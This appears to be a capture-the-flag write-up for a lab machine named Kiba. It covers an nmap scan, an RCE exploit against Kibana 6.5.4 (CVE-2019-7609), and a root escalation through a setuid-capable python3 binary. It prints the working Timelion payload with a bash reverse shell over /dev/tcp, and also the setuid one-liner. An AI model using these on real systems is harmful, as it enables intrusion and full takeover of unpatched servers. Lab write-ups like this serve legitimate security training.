# Kiba

## Nmap

```
sudo nmap 10.10.176.245 -p- -sS -sV                                           

PORT     STATE SERVICE      VERSION
22/tcp   open  ssh          OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
80/tcp   open  http         Apache httpd 2.4.18 ((Ubuntu))
5044/tcp open  lxi-evntsvc?
5601/tcp open  esmagent?
```

Port 80 takes us to the following:

![http://10.10.176.245/index.html](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-40d2ed7b537c9598076a0de1abedad2c3148bef4%2Fimage.png?alt=media)

The sentance is a possible hint for later regarding capabilities. Otherwise I was unable to enumerate further interesting directories with Gobuster.

On port 5601 we have Kibana installed.

![http://10.10.176.245:5601/app/kibana#/home?\_g=()](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-d64c7c9b61cad50914ddf01e129d6b90c6e7bd4a%2Fimage.png?alt=media)

Checking the management pane shows we are running on version 6.5.4

![http://10.10.176.245:5601/app/kibana#/management?\_g=()](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-01fdcf9445dbe33a9303961df995683497ca98e1%2Fimage.png?alt=media)

Research related exploits we come across a RCE exploit that effect versions prior to 6.6.

{% embed url="<https://github.com/mpgn/CVE-2019-7609>" %}

As per the exploit head over to the Timelion pane in Kibana and paste the following payload:

```
.es(*).props(label.__proto__.env.AAAA='require("child_process").exec("bash -c \'bash -i>& /dev/tcp/127.0.0.1/6666 0>&1\'");//')
.props(label.__proto__.env.NODE_OPTIONS='--require /proc/self/environ')
```

Swapping out the IP and port where required.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-27433afd976452ce54d60dd6813e8563d991b9c8%2Fimage.png?alt=media)

Hit run and then proceed to the 'Canvas' pane. Shortly after we should recieve a shell back on our netcat listener.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-433ea6ff2b202dbd1c03f306beae2c8fe893f37a%2Fimage.png?alt=media)

From here we can check all capabilities with:

```
getcap -r / 2>/dev/null

/home/kiba/.hackmeplease/python3 = cap_setuid+ep
/usr/bin/mtr = cap_net_raw+ep
/usr/bin/traceroute6.iputils = cap_net_raw+ep
/usr/bin/systemd-detect-virt = cap_dac_override,cap_sys_ptrace+ep
```

This reveals a python binary in /home/kiba/.hackmeplease. We can run the following command to launch a Python shell as root.

```
home/kiba$ /home/kiba/.hackmeplease/python3 -c 'import os; os.setuid(0); os.system("/bin/sh")'
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-68c0db64c68ea05004454feae9f6c9c2ac0d1ea6%2Fimage.png?alt=media)